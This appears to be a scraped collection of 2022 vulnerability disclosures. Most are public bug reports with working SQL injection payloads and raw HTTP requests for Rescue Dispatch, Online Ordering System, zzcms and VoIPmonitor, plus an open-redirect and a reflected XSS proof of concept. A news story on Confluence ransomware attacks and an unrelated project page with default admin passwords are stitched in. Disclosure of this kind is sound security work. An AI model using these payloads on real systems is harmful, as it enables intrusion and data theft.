Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via \rdms\admin?page=user\manage_user&id=.

**Rescue Dispatch Management System 1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: \\rdms\\admin?page=user\\manage\_user&id=

Vulnerability location: /cms/rdms/admin/?page=user/manage\_user&id=, id

\[+\] Payload: ip/rdms/admin/?page=user/manage\_user&id=-3%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+

GET /rdms/admin/?page\=user/manage\_user&id\=\-3%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close

CVE-2022-31941: bug_report/SQL-1.md at main · Gsir97/bug_report

Most of the attacks involve the use of automated exploits, security vendor says.

A recently disclosed critical remote code execution (RCE) vulnerability in Atlassian's Confluence Server collaboration platform is now under active attack, in a spate of attacks bent on deploying a variety of malware, including ransomware.  

Researchers from Sophos have observed several attacks over the past two weeks in which attackers used automated exploits against vulnerable Confluence instances running on Windows and Linux servers. In at least two of the Windows-related incidents, adversaries exploited the Atlassian vulnerability to drop Cerber ransomware on the victim networks, the security vendor said in a report Thursday.

Atlassian disclosed the vulnerability in Confluence Server (CVE-2022-26134) over Memorial Day weekend, after researchers from Volexity informed the company about the issue, which they discovered while investigating a breach at a customer location. 

The bug — present in all current versions of Atlassian Confluence Server and Confluence Data Center — basically gives unauthenticated attackers a way to drop a remotely accessible in-memory-only Web shell on systems running a vulnerable version of the collaboration software. In the attack that Volexity investigated, the threat actors then used the Web shell access to drop other malware on the compromised system, which, among other things, gave them persistent backdoor access to it.

The bug stirred some concern because it gave attackers a way to access potentially sensitive project, customer, and other data in Confluence environments. At the time the bug was disclosed, Atlassian did not have a patch for it. However, the company released a fix one a day later, on June 3.

**Ongoing Confluence Attacks**

According to Sophos, while the number of vulnerable Confluence servers has been dwindling since then, attacks continue, making it more important than ever to patch. In most of the attacks that the security vendor observed, threat actors appeared to be using the fileless Web shell to try and spread an existing collection of malware tools more widely. 

The various payloads that Sophos observed include Mirai bot variants, a cryptominer known as z0miner, and pwnkit, a tool for gaining root access on most Linux distributions. Sophos said it also observed attackers exploiting the Atlassian Confluence vulnerability to drop ASP- and PHP-based Web shells on vulnerable systems, likely as a precursor to dropping other malware on them.

Sophos said it also has observed attackers running PowerShell commands and downloading shell code for deploying the post-compromise Cobalt Strike toolkit on Windows servers running a vulnerable version of Confluence. In two incidents, a threat actor tried to deploy Cerber ransomware via the Confluence exploit using an encoded PowerShell command to download and execute the malware. In both incidents, the attackers suggested they had also stolen data from the victims for use as additional leverage for extracting a ransom payment. 

However, there was no evidence that the threat actors had actually exfiltrated any data, Sophos said.

**Double-Extortion Threats**

Double-extortion ransomware attacks like the Cerber incidents have become increasingly common since the Maze ransomware group started the trend back in early 2020. With these attacks, threat actors not only encrypt data, but they also threaten to publicly release the data if their ransom demands are not met.

A recent study of the practice by Rapid7 showed that threat actors trying to coerce victims into paying a ransom most frequently leaked a company’s financial data (63%) first, followed by customer data (48%). However, Rapid7 found variances by industry in the types of data that attackers tend to leak initially. 

For instance, with financial services victims, attackers generally tended to leak customer data first (83% of the time), instead of the victim's internal financial data. However, when it came to organizations in the healthcare and pharmaceutical sectors, ransomware actors leaked the victim's financial data 71% of the time, which was more substantially more frequent than incidents involving leaks of customer data.

Rapid7 also discovered differences among ransomware actors when it comes to the type of data they leaked. For instance, 81% of the incidents involving Conti ransomware featured publicly leaked financial data. The Cl0p group, on the other hand, disclosed employee information (70%) more than any other type of information.

Atlassian Confluence Server Bug Under Active Attack to Distribute Ransomware

An issue was discovered in u5cms verion 8.3.5 There is a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.

URL redirection vulnerability in u5cms v8.3.5

This script is possibly vulnerable to URL redirection attacks.

URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting. By modifying the parameters, the attacker can make the user jump to the phishing web page to realize the attack.

URL redirection vulnerability exists in /loginsave.php. When the user accesses the address constructed by the attacker, the web page will be redirected to the address pointed to by the parameter "u", instead of u5cms' own web page.

The payload is /loginsave.php?u=http://xfs.bxss.me/

When users access this URL, the browser will be redirected to https://www.acunetix.com/vulnerability-scanner/acumonitor-technology

Here are the HTTP request and HTTP response.

HTTP request:

    GET /loginsave.php?u=http://xfs.bxss.me/ HTTP/1.1
    Host: 192.168.116.133
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    

HTTP response:

    HTTP/1.1 302 Moved Temporarily
    Date: Sat, 04 Jun 2022 03:09:40 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.3.29
    X-XSS-Protection: 0
    Set-Cookie: u=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; httponly
    Set-Cookie: p=56e2526ba3e8ff31822f36a269d6434027ba5dcd; path=/; httponly
    Location: [http://xfs.bxss.me?1654312181](http://xfs.bxss.me/?1654312181)
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=latin1
    

Eventually, the browser will be redirected to https://www.acunetix.com/vulnerability-scanner/acumonitor-technology/

If possible, I suggest you check whether the end of the domain name is the current domain name during the development process. If yes, the browser will jump. Otherwise, you should filter out illegal parameters.

Best wishes!

CVE-2022-32444: URL redirection vulnerability in u5cms v8.3.5 · Issue #50 · u5cms/u5cms

Online Ordering System v2.3.2 was discovered to contain a SQL injection vulnerability via /ordering/admin/inventory/index.php?view=edit&id=.

**Online Ordering System By janobe has SQL injection vulnerability**

Author： Wang Chen Jun

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/admin/inventory/index.php?view=edit&id=

Vulnerability location: /ordering/admin/inventory/index.php?view=edit&id= //id is Injection point

\[+\]Payload: /ordering/admin/inventory/index.php?view=edit&id=-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ //id is Injection point

Current database name: multistoredb

GET /ordering/admin/inventory/index.php?view\=edit&id\=\-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-31357: bug_report/SQLi-3.md at main · k0xx11/bug_report

Online Ordering System v2.3.2 was discovered to contain a SQL injection vulnerability via /ordering/admin/store/index.php?view=edit&id=.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System By janobe has SQL injection vulnerability**

Author： Wang Chen Jun

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/admin/store/index.php?view=edit&id=

Vulnerability location: /ordering/admin/store/index.php?view=edit&id= //id is Injection point

\[+\]Payload: /ordering/admin/store/index.php?view=edit&id=-9%27%20union%20select%201,database(),3,4,5,6,7--+ //id is Injection point

Current database name: multistoredb

GET /ordering/admin/store/index.php?view\=edit&id\=\-9%27%20union%20select%201,database(),3,4,5,6,7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-31356: bug_report/SQLi-4.md at main · k0xx11/bug_report

Online Ordering System v2.3.2 was discovered to contain a SQL injection vulnerability via /ordering/index.php?q=category&search=.

Permalink

**Online Ordering System By janobe has SQL injection vulnerability**

Author： Lingtao Wang

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/index.php?q=category&search=

Vulnerability location: /ordering/index.php?q=category&search= //search is Injection point

\[+\]Payload: /ordering/index.php?q=category&search=3%20and%20length(database())%20=12--+ //search is Injection point

Current database name: multistoredb,length is 12

GET /ordering/index.php?q\=category&search\=3%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

When length (database ()) = 11, Content-Length: 18685 

When length (database ()) = 12, Content-Length: 23327

CVE-2022-31355: bug_report/SQLi-2.md at main · k0xx11/bug_report

An issue was discovered in zzcms 2019. There is a SQL injection Vulnerability in /dl/dl_sendmail.php (when the attacker has dls_print authority) via a dlid cookie.

1.  user/dls\_print.php

0x01 Vulnerability (/user/dls\_print.php line 51 ~ 56)  

If index of ',' value in id parameter is not false sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in "/user/dls\_download.php"  
POC : union SQL injection  
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page\_size%3D2&FileExt=  
xls&sql=select+count%28\*%29+as+total+from+zzcms\_dl+where+classid%3D1+&chkAll=checkbox  
&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,  

1.  user/dls\_download.php

0x01 Vulnerability (/user/dls\_download.php line 43 ~ 46)  

If index of ',' value in id parameter is not false sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in "/user/dls\_download.php"  
POC : union SQL injection  
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page\_size%3D2&FileExt=  
xls&sql=select+count%28\*%29+as+total+from+zzcms\_dl+where+classid%3D1+&chkAll=checkbox  
&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,

3.  dl/dl\_sendmail.php

0x01 Vulnerability (/dl/dl\_sendmail.php line 69 ~ 73)  

If index of ',' value in COOKIE\[‘dlid’\] parameter is bigger than 0 sql will be  

When we check the query there is no single quote to COOKIE\[‘dlid’\] parameter. So We can inject  
any query with COOKIE\[‘dlid’\] parameter  

n var will get value via GET\[‘n’\] and if n var value is not 0 php does not make dlid COOKIE  
value. So We can inject any query if we give any value without 0 via GET\[‘n’\] parameter

0x02 payload  
give below "POC" value for cookie data in “/dl/dl\_sendmail.php?n=1234"  
POC : Time based sql injection  
COOKIE\[‘dlid’\] = 1) union select sleep(3)-- a,

4.  dl/dl\_sendsms.php

0x01 Vulnerability (/dl/dl\_sendsms.php line 73 ~ 77)  

If index of ',' value in COOKIE\[‘dlid’\] parameter is bigger than 0 sql will be  

When we check the query there is no single quote to COOKIE\[‘dlid’\] parameter. So We can inject  
any query with COOKIE\[‘dlid’\] parameter  

n var will get value via GET\[‘n’\] and if n var value is not 0 php does not make dlid COOKIE  
Value. So We can inject any query if we give any value without 0 via GET\[‘n’\] parameter

0x02 payload  
give below "POC" value for cookie data in “/dl/dl\_sendsms.php?n=1234"  
POC : Time based sql injection  
COOKIE\[‘dlid’\] = 1) union select sleep(3)-- a,

5.  admin/deluser.php

0x01 Vulnerability (/admin/deluser.php line 28 ~ 32)  

If index of ',' value in id parameter is bigger than 0 sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in “/admin/deluser.php "  
POC : union sql injection  
tablename=zzcms\_main&id\[0\]=1) union select 1234,@@version-- a,

6.  admin/dl\_sendmail.php

0x01 Vulnerability (/admin/dl\_sendmail.php line 32 ~ 36)  

If index of ',' value in id parameter is bigger than 0 sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in “/admin/dl\_sendmail.php "  
POC : union Time base sql injection  
id\[0\]=1) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(3)-- a,

7.  admin/showbad.php

0x01 Vulnerability (/admin/showbad.php line 26 ~ 32)  

If index of ',' value in id parameter is bigger than 0 sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in “/admin/showbad.php?action=del "  
POC : Time base sql injection  
id\[0\]=2342342) || IF((1=1),sleep(3),2)-- a,

8.  admin/ztliuyan\_sendmail.php

0x01 Vulnerability (/admin/ztliuyan\_sendmail.php line 31 ~ 36)  

If index of ',' value in id parameter is bigger than 0 sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in “/admin/ztliuyan\_sendmail.php"  
POC : union Time base sql injection  
id\[0\]=2342342) union select 1,2,3,4,5,6,7,8,9,sleep(2)-- a,

CVE-2019-12352: zzcms 2019 SQL INJECTION LIST · Issue #5 · cby234/zzcms

VoIPmonitor WEB GUI up to version 24.61 is affected by SQL injection through the "api.php" file and "user" parameter.

sql injection on user parameter. since, api.php file doesnt need any authentication attacker can exploit this vulnerability without any valid session or credentials.

GET /voipmonitorpath/api.php?action=login&user=\[inject\_here\]&pass=trollz HTTP/1.1
Host: vulnerableinstance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: close

sqlmap result:

Parameter: #1\* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://vulnerableinstance:80/voipmonitorpath/api.php?action=login&user=' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))Evax) AND 'jvDj'='jvDj&pass=trollz
\---
\[02:19:33\] \[INFO\] testing MySQL
\[02:20:22\] \[INFO\] confirming MySQL
web application technology: Nginx 1.14.2, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.3.29-MariaDB-1:10.3.29+maria~stretch'

cc: @cnbrkbolat & @R0h1rr1m

CVE-2021-41408: voipmonitor unauth sql injection

Online Discussion Forum Site 1 was discovered to contain a blind SQL injection vulnerability via the component /odfs/posts/view_post.php.

Submitted by oretnom23 on Monday, May 16, 2022 - 15:15.

****Introduction****

This simple project is entitled **Online Discussion Forum Site**. This is a web-based application project developed in **PHP** and **MySQL Database**. This simple project's main goal is to provide an online platform for an organization where they can discuss any topic that is related to the site or organization. The site allows users to post any topic under a certain topic category. Users can post comments on each posted published topic. The system user interface was developed with **Bootstrap Framework** and **AdminLTE Framework**. It also consists of user-friendly features and functionalities.

****About the Online Discussion Forum Site****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Font Awesome**
*   **AdminLTE**

This **Online Discussion Forum Site** is accessible to anyone and site management. As I mentioned at beginning of this article, the project allows users to post or published certain topics. Each published topic is visible to the public and registered users. The system requires the users to register and log in with their credentials to gain access to posting topics and comments. This project also contains an Admin Panel Site where the site management can manage all the data on the system. This side of the project requires an administrator user credential to gain access to the features and functionalities. On this site, the management can overwrite, and delete users' posts and comments. The admin users also can create a new topic on this site. The Admin Users are the ones who are in charge of populating the topic category list. They can also update the system name, logo, etc.

****Features******User-Side**

*   **Login and Registration**
*   **Home Page**
    *   Display the Carousel
    *   List All Published Topics
    *   Search Published Topics
*   **Topic Categories Page**
    *   Lists All the Active Topic Categories
    *   Search Category
    *   Shows the Topic Category Description
*   **Add Post Page**
*   **My Post Page**
    *   List All the user Create Topics (Published/Unpublished)
    *   Search Created Topic
*   **Edit or Update Posted Topic**
*   **Comment Section**
*   **Delete Posted Topics**
*   **Delete Posted Comments**
*   **Update Account Details/Credentials**
*   **Logout**

**Admin-Side**

*   **Home Page**
    *   Display the summary and images.
*   **Category Management**
    *   Add new Category
    *   List All Categories
    *   View Category Details
    *   Edit/Update Category Details
    *   Delete Category
*   **Post Management**
    *   Create New Post
    *   List All Posts
    *   View Post Details
    *   Edit/Update Post Details
    *   Comment Section
    *   Delete Comments
    *   Delete Post
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Delete User Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******User Registration Page****

****Home Page****

****Topic Categories Page****

****Post List Page****

****Post Form Page****

****Post Details****

****Post's Comment Section****

****Admin Dashboard Page****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****odfs\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****odfs\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Online Discussion Forum Site** in a **browser**. i.e. ****http://localhost/odfs/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****Sample User Access:****

Username: **mcooper**  
Password: **mcooper123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **Online Discussion Forum Site** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1378 views

CVE-2022-31296: Online Discussion Forum Site in PHP/OOP Free Source Code

Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form.

**CVE-2022-31299**

Haraj Script 3.7 - Reflected XSS

**Exploit Title: Haraj Script 3.7 - Reflected XSS****Date: 2022-06-13****CVE: CVE-2022-31299****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://angtech.org/****Software Link: https://angtech.org/product/view/3****Version: 3.7****Tested on: LAMP, Ubuntu**

\[#\] Exploitation : https://localhost/harajnext/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(String.fromCharCode(98,52,122,98,48,122))%3C/script%3E

Tag

#php